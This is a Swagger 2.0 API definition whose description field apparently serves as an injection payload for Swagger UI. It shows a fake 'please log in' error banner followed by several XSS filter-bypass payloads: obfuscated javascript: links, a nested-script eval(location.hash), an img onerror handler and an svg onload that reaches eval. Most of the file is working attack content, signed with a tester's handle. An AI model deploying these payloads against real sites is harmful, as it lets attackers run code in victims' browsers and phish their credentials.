swagger: '2.0'
info:
  version: 1.0.0
  title: Login Page
  description: '<div class="login-form">
<!-- Error Message -->
<div style="width: 100%; max-width: 400px; margin: 20px auto; padding: 20px; background: #f8d7da; border-radius: 8px; box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);">
  <div style="background-color: #f8d7da; color: #721c24; padding: 16px 20px; border-radius: 4px; border: 1px solid #f5c6cb; font-size: 16px; text-align: center;">
    <strong>An error occurred while loading, please log in.</strong>
  </div>
</div>
<!-- Login Form -->
<a href="j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t:console.log(1337)">XSS</a>

<scr<script>ipt>eval(location.hash.slice(1))</scr<script>ipt>
<Img Src=OnXSS OnError=(aLeRt)(1)>

<svg onload="{hello:window . name instanceof{[Symbol.hasInstance]:eval}}">
<a href="%02%02ja%09v%09a%09s%0cc%0crip%26NewLine;t:alert%26lpar;%26%23x000000000000000029;"&gt;
<!-- Footer with your name -->
<div style="position: fixed; bottom: 10px; right: 10px; font-size: 12px; color: #888;">
  Coffinxp~/.lostsec
</div>
  '
paths:
  /:
    post:
      responses:
        '200':
          description: Login successful
